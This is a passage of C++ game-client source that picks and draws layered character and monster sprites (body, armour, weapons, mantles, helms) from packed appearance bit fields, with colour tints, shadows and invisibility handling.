			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*3 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 3;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (2 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 2;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 2;
			}else iBodyArmorIndex = -1;
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 2;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 2;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 2;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*2 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 2;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 2;
		}
		break;
	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		if ((_tmp_sAppr2 & 0xF000) != 0)
		{	iAdd = 3;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}else  iBodyArmorIndex = -1;
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				 iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*3 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 3;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (2 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 2;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 2;
			}else iBodyArmorIndex = -1;
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 2;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 2;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 2;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*2 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 2;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 2;
		}
		break;
	default:
		iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (1 * 8);
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iBodyArmorIndex = -1;
		iArmArmorIndex  = -1;
		iBootsIndex     = -1;
		iPantsIndex     = -1;
		iWeaponIndex    = -1;
		iShieldIndex    = -1;
		iHelmIndex      = -1;
		break;
	}
	dx = 0;
	dy = 0;
	if (_cDrawingOrder[_tmp_cDir] == 1)
	{	if (iWeaponIndex != -1)
		{	if (iWeaponColor == 0)
				 m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
		}
		switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
		case 10: // Slime
		case 35: // Energy Sphere
		
		case 81: // Abaddon
		case 91: // Gate
			break;
		default:
			if (m_cDetailLevel != 0)
			{	if (sX < 50)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}
			break;
		}
		if (bInv == TRUE)
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
		else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);


		if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
		{	if (iMantleColor == 0)
				 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}
		if (iUndiesIndex != -1)
		{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
		}

		if ((iHairIndex != -1) && (iHelmIndex == -1))
		{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
			m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
		}
		if ((iBootsIndex != -1) && (iSkirtDraw == 1))
		{	if (iBootsColor == 0)
				 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}
		if (iPantsIndex != -1)
		{	if (iPantsColor == 0)
				 m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
		}
		if (iArmArmorIndex != -1)
		{	if (iArmColor == 0)
				 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
		}
		if ((iBootsIndex != -1) && (iSkirtDraw == 0))
		{	if (iBootsColor == 0)
				 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}
		if (iBodyArmorIndex != -1)
		{	if (iArmorColor == 0)
				 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
		}
		if (iHelmIndex != -1)
		{	if (iHelmColor == 0)
				 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
		}
		if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
		{	if (iMantleColor == 0)
				 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}

		if (iShieldIndex != -1)
		{	if (iShieldColor == 0)
				 m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
		}
		if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
		{	if (iMantleColor == 0)
				 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}
	}else
	{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
		case 10: // Slime
		case 35: // Energy Sphere
		
		case 81: // Abaddon
		case 91: // Gate
			break;
		default:
			if (m_cDetailLevel != 0)
			{	if (sX < 50)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}
			break;
		}

		if (bInv == TRUE)
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
		else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);

		if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
		{	if (iMantleColor == 0)
				 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}
		if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);

		if ((iHairIndex != -1) && (iHelmIndex == -1))
		{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
			m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
		}
		if ((iBootsIndex != -1) && (iSkirtDraw == 1))
		{	if (iBootsColor == 0)
				 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}
		if (iPantsIndex != -1)
		{	if (iPantsColor == 0)
				 m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
		}
		if (iArmArmorIndex != -1)
		{	if (iArmColor == 0)
				 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
		}
		if ((iBootsIndex != -1) && (iSkirtDraw == 0))
		{	if (iBootsColor == 0)
				 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}
		if (iBodyArmorIndex != -1)
		{	if (iArmorColor == 0)
				 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
		}
		if (iHelmIndex != -1)
		{	if (iHelmColor == 0)
				 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
		}
		if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
		{	if (iMantleColor == 0)
				 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}

		if (iShieldIndex != -1)
		{	if (iShieldColor == 0)
				 m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
		}
		if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
		{	if (iMantleColor == 0)
				 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}
		if (iWeaponIndex != -1)
		{	if (iWeaponColor == 0)
				 m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
	}	}

	if (_tmp_iChatIndex != NULL)
	{	if (m_pChatMsgList[_tmp_iChatIndex] != NULL)
		{	DrawChatMsgBox(sX+dx, sY+dy, _tmp_iChatIndex, FALSE);
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	_tmp_dx = dx;
	_tmp_dy = dy;
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;
	return FALSE;
}


BOOL   CGame::DrawObject_OnStop(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iBodyArmorIndex, iArmArmorIndex, iPantsIndex, iBootsIndex, iHelmIndex, iR, iG, iB;
 int iWeaponIndex, iShieldIndex, iMantleIndex;
 BOOL bInv = FALSE;
 int iWeaponGlare, iShieldGlare;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	if(_tmp_sOwnerType == 35  || _tmp_sOwnerType == 81) bInv = TRUE; //Energy-Ball, Wyvern
	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}

	iWeaponGlare = (_tmp_sAppr4 & 0x000C) >> 2;
	iShieldGlare = (_tmp_sAppr4 & 0x0003);
	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInv = TRUE;
		else if (bCheckItemEquiped("NecklaceOfBeholder") == true) bInv = TRUE; // beholder neck
		else if( _iGetFOE(_tmp_iStatus) == 1 ) bInv = TRUE;
		else return FALSE;
	}

	// CLEROTH - Single-direction monsters
	switch(_tmp_sOwnerType){
	case 110: // Air Elemental
		_tmp_cDir = 1; // North
		break;
	case 91: // Snoopy: Gate
		if (_tmp_cDir <= 3) _tmp_cDir = 3;
		else  _tmp_cDir = 5;
		break;
	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		_tmp_cFrame = _tmp_cFrame / 2;
		if ((_tmp_sAppr2 & 0xF000) != 0)
		{	iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (1 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 1;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 1;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 1;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 1;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 1;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 1;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*1 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 1;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 1;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 1;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (0 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*0 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 0;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 0;
		}
		break;

	case 4:
	case 5:
	case 6:
		_tmp_cFrame = _tmp_cFrame / 2;
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		if ((_tmp_sAppr2 & 0xF000) != 0)
		{	iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (1 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 1;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 1;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 1;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 1;
